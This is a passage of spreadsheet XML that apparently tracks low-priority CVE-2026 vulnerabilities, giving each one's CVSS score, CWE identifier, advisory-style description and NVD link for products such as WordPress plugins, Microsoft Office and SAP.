        <is>
          <t>CVE-2026-75793</t>
        </is>
      </c>
      <c r="C4009" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4009" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4009" s="5" t="inlineStr"/>
      <c r="F4009" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4009" s="5" t="inlineStr"/>
      <c r="H4009" s="5" t="inlineStr"/>
      <c r="I4009" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4009" s="5" t="inlineStr"/>
      <c r="K4009" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L4009" s="5" t="inlineStr">
        <is>
          <t>The SureCart  WordPress plugin before 4.7.0 does not consult the site's user registration setting before creating WordPress accounts, allowing unauthenticated users to create an account and receive a logged-in session even when registration is disabled.</t>
        </is>
      </c>
      <c r="M4009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75793</t>
        </is>
      </c>
    </row>
    <row r="4010">
      <c r="A4010" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75861</t>
        </is>
      </c>
      <c r="C4010" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4010" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4010" s="5" t="inlineStr"/>
      <c r="F4010" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4010" s="5" t="inlineStr"/>
      <c r="H4010" s="5" t="inlineStr"/>
      <c r="I4010" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4010" s="5" t="inlineStr"/>
      <c r="K4010" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4010" s="5" t="inlineStr">
        <is>
          <t>The Ultimate Gift Cards for WooCommerce WordPress plugin before 3.2.10 does not verify that the user redeeming a gift card is its intended recipient, allowing any authenticated user, such as a subscriber, to redeem gift cards belonging to other users, zeroing their balance and crediting the value to themselves.
In 3.2.9 an ownership check was added on one of the two affected redemption paths; the one that remains requires a companion Ultimate Gift Cards for WooCommerce WordPress plugin before 3.2.10 from the same vendor to be active.</t>
        </is>
      </c>
      <c r="M4010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75861</t>
        </is>
      </c>
    </row>
    <row r="4011">
      <c r="A4011" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75880</t>
        </is>
      </c>
      <c r="C4011" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4011" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4011" s="5" t="inlineStr"/>
      <c r="F4011" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4011" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H4011" s="5" t="inlineStr"/>
      <c r="I4011" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4011" s="5" t="inlineStr"/>
      <c r="K4011" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L4011" s="5" t="inlineStr">
        <is>
          <t>An authenticated client could attach a consumer with a selector containing crafted wildcard usage that results in excessive evaluation during message delivery attempts, occupying a shared broker thread and leading to denial of service.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes this issue.</t>
        </is>
      </c>
      <c r="M4011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75880</t>
        </is>
      </c>
    </row>
    <row r="4012">
      <c r="A4012" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76000</t>
        </is>
      </c>
      <c r="C4012" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4012" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4012" s="5" t="inlineStr"/>
      <c r="F4012" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4012" s="5" t="inlineStr"/>
      <c r="H4012" s="5" t="inlineStr"/>
      <c r="I4012" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4012" s="5" t="inlineStr"/>
      <c r="K4012" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L4012" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction.</t>
        </is>
      </c>
      <c r="M4012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76000</t>
        </is>
      </c>
    </row>
    <row r="4013">
      <c r="A4013" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76968</t>
        </is>
      </c>
      <c r="C4013" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4013" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4013" s="5" t="inlineStr"/>
      <c r="F4013" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4013" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H4013" s="5" t="inlineStr"/>
      <c r="I4013" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4013" s="5" t="inlineStr"/>
      <c r="K4013" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L4013" s="5" t="inlineStr">
        <is>
          <t>SAP Web Dispatcher, Internet Communication Manager and SAP Content Server allows an authenticated low-privileged attacker to access certain administrative functionality or interface and obtain sensitive information about the system state, resulting in information disclosure. This disclosed information could potentially be used to facilitate further attacks. This vulnerability has a high impact on the confidentiality of the application, with no impact on integrity or availability.</t>
        </is>
      </c>
      <c r="M4013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76968</t>
        </is>
      </c>
    </row>
    <row r="4014">
      <c r="A4014" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76971</t>
        </is>
      </c>
      <c r="C4014" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4014" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4014" s="5" t="inlineStr"/>
      <c r="F4014" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4014" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H4014" s="5" t="inlineStr"/>
      <c r="I4014" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4014" s="5" t="inlineStr"/>
      <c r="K4014" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4014" s="5" t="inlineStr">
        <is>
          <t>Due to a Server-Side Request Forgery (SSRF) vulnerability in SAP Manufacturing Integration and Intelligence, an attacker could cause the server to initiate arbitrary outbound requests. If processed by the application, this behavior could be combined with XML/XSL processing to enable execution of scripts. Successful exploitation could result in a low impact on the confidentiality, integrity, and availability of the application.</t>
        </is>
      </c>
      <c r="M4014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76971</t>
        </is>
      </c>
    </row>
    <row r="4015">
      <c r="A4015" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77896</t>
        </is>
      </c>
      <c r="C4015" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4015" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4015" s="5" t="inlineStr"/>
      <c r="F4015" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4015" s="5" t="inlineStr"/>
      <c r="H4015" s="5" t="inlineStr"/>
      <c r="I4015" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4015" s="5" t="inlineStr"/>
      <c r="K4015" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L4015" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Remote Desktop Client allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M4015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77896</t>
        </is>
      </c>
    </row>
    <row r="4016">
      <c r="A4016" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77911</t>
        </is>
      </c>
      <c r="C4016" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4016" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4016" s="5" t="inlineStr"/>
      <c r="F4016" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4016" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4016" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I4016" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4016" s="5" t="inlineStr"/>
      <c r="K4016" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4016" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77911</t>
        </is>
      </c>
    </row>
    <row r="4017">
      <c r="A4017" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78441</t>
        </is>
      </c>
      <c r="C4017" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4017" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4017" s="5" t="inlineStr"/>
      <c r="F4017" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4017" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4017" s="5" t="inlineStr"/>
      <c r="I4017" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4017" s="5" t="inlineStr"/>
      <c r="K4017" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4017" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows OLE DB allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78441</t>
        </is>
      </c>
    </row>
    <row r="4018">
      <c r="A4018" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78453</t>
        </is>
      </c>
      <c r="C4018" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4018" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4018" s="5" t="inlineStr"/>
      <c r="F4018" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G4018" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4018" s="5" t="inlineStr"/>
      <c r="I4018" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4018" s="5" t="inlineStr"/>
      <c r="K4018" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L4018" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78453</t>
        </is>
      </c>
    </row>
    <row r="4019">
      <c r="A4019" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78481</t>
        </is>
      </c>
      <c r="C4019" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4019" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4019" s="5" t="inlineStr"/>
      <c r="F4019" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4019" s="5" t="inlineStr"/>
      <c r="H4019" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4019" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4019" s="5" t="inlineStr"/>
      <c r="K4019" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L4019" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Hard-coded Cryptographic Key vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.</t>
        </is>
      </c>
      <c r="M4019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78481</t>
        </is>
      </c>
    </row>
    <row r="4020">
      <c r="A4020" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78488</t>
        </is>
      </c>
      <c r="C4020" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4020" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4020" s="5" t="inlineStr"/>
      <c r="F4020" s="5" t="n">
        <v>0.032</v>
      </c>
      <c r="G4020" s="5" t="inlineStr"/>
      <c r="H4020" s="5" t="inlineStr"/>
      <c r="I4020" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4020" s="5" t="inlineStr"/>
      <c r="K4020" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L4020"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command execution.</t>
        </is>
      </c>
      <c r="M4020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78488</t>
        </is>
      </c>
    </row>
    <row r="4021">
      <c r="A4021" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78502</t>
        </is>
      </c>
      <c r="C4021" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4021" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4021" s="5" t="inlineStr"/>
      <c r="F4021" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4021" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4021" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I4021" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4021" s="5" t="inlineStr"/>
      <c r="K4021" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4021" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78502</t>
        </is>
      </c>
    </row>
    <row r="4022">
      <c r="A4022" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78503</t>
        </is>
      </c>
      <c r="C4022" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4022" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4022" s="5" t="inlineStr"/>
      <c r="F4022" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G4022" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4022" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I4022" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4022" s="5" t="inlineStr"/>
      <c r="K4022" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4022" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78503</t>
        </is>
      </c>
    </row>
    <row r="4023">
      <c r="A4023" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78515</t>
        </is>
      </c>
      <c r="C4023" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4023" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4023" s="5" t="inlineStr"/>
      <c r="F4023" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G4023" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4023" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4023" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4023" s="5" t="inlineStr"/>
      <c r="K4023" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4023" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78515</t>
        </is>
      </c>
    </row>
    <row r="4024">
      <c r="A4024" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78520</t>
        </is>
      </c>
      <c r="C4024" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4024" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4024" s="5" t="inlineStr"/>
      <c r="F4024" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4024" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4024" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I4024" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4024" s="5" t="inlineStr"/>
      <c r="K4024" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4024" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M4024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78520</t>
        </is>
      </c>
    </row>
    <row r="4025">
      <c r="A4025" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78522</t>
        </is>
      </c>
      <c r="C4025" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4025" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4025" s="5" t="inlineStr"/>
      <c r="F4025" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4025" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4025" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I4025" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4025" s="5" t="inlineStr"/>
      <c r="K4025" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4025" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78522</t>
        </is>
      </c>
    </row>
    <row r="4026">
      <c r="A4026" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78536</t>
        </is>
      </c>
      <c r="C4026" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4026" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4026" s="5" t="inlineStr"/>
      <c r="F4026" s="5" t="inlineStr"/>
      <c r="G4026" s="5" t="inlineStr"/>
      <c r="H4026" s="5" t="inlineStr"/>
      <c r="I4026" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4026" s="5" t="inlineStr"/>
      <c r="K4026" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4026" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Robokassa payment gateway for Woocommerce &lt;= 1.8.9 versions.</t>
        </is>
      </c>
      <c r="M4026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78536</t>
        </is>
      </c>
    </row>
    <row r="4027">
      <c r="A4027" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78658</t>
        </is>
      </c>
      <c r="C4027" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4027" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4027" s="5" t="inlineStr"/>
      <c r="F4027" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4027" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4027" s="5" t="inlineStr"/>
      <c r="I4027" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4027" s="5" t="inlineStr"/>
      <c r="K4027" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="L4027" s="5" t="inlineStr">
        <is>
          <t>IBM UCD - IBM UrbanCode Deploy 7.2 through 7.2.3.25, and 7.3 through 7.3.2.20 and IBM UCD - IBM DevOps Deploy 8.0 through 8.0.1.15, 8.1 through 8.1.2.8, and 8.2 through 8.2.2.1 IBM DevOps Deploy / IBM UrbanCode Deploy (UCD) is susceptible to an formation disclosure vulnerability when processing redacted property values. If a deployment is configured with a secure property that starts with certain non-ASCII characters, the redaction engine may fail to mask subsequent ASCII secure values embedded inside unsecure properties. An authenticated user with permissions to view deployment request details could exploit this flaw via the UI or API to view sensitive values in plain text that should otherwise be redacted.</t>
        </is>
      </c>
      <c r="M4027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78658</t>
        </is>
      </c>
    </row>
    <row r="4028">
      <c r="A4028" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78701</t>
        </is>
      </c>
      <c r="C4028" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4028" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4028" s="5" t="inlineStr"/>
      <c r="F4028" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4028" s="5" t="inlineStr"/>
      <c r="H4028" s="5" t="inlineStr"/>
      <c r="I4028" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4028" s="5" t="inlineStr"/>
      <c r="K4028" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L4028" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in 389-ds-base. A remote, authenticated attacker could exploit a vulnerability in the Simple Authentication and Security Layer (SASL) UNBIND process. By sending a specially crafted request, the attacker can cause a connection to stall, leading to resource exhaustion and a Denial of Service (DoS) for the server.</t>
        </is>
      </c>
      <c r="M4028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78701</t>
        </is>
      </c>
    </row>
    <row r="4029">
      <c r="A4029" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78838</t>
        </is>
      </c>
      <c r="C4029" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4029" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4029" s="5" t="inlineStr"/>
      <c r="F4029" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4029" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4029" s="5" t="inlineStr"/>
      <c r="I4029" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4029" s="5" t="inlineStr"/>
      <c r="K4029" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4029" s="5" t="inlineStr">
        <is>
          <t>A reflected cross-site scripting (XSS) vulnerability in the grid_datasource.php component of AppNitro MachForm v30 allows attackers to execute arbitrary Javascript in the context of the victim's browser via injecting a crafted payload into the filter[filters][0][field] parameter.</t>
        </is>
      </c>
      <c r="M4029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78838</t>
        </is>
      </c>
    </row>
    <row r="4030">
      <c r="A4030" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78970</t>
        </is>
      </c>
      <c r="C4030" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4030" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4030" s="5" t="inlineStr"/>
      <c r="F4030" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4030" s="5" t="inlineStr"/>
      <c r="H4030" s="5" t="inlineStr"/>
      <c r="I4030" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4030" s="5" t="inlineStr"/>
      <c r="K4030" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4030" s="5" t="inlineStr">
        <is>
          <t>JeecgBoot 3.9.2 and earlier contains an authorization bypass vulnerability in the SystemApiController component. An authenticated attacker with any valid JWT token can access multiple API endpoints (including queryAllUser, queryUsersByUsernames, queryUserById, and queryUsersByIds) to retrieve sensitive information of all users, including real names, phone numbers, email addresses, employee numbers, and role definitions, due to missing fine-grained permission checks and incomplete data desensitization.</t>
        </is>
      </c>
      <c r="M4030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78970</t>
        </is>
      </c>
    </row>
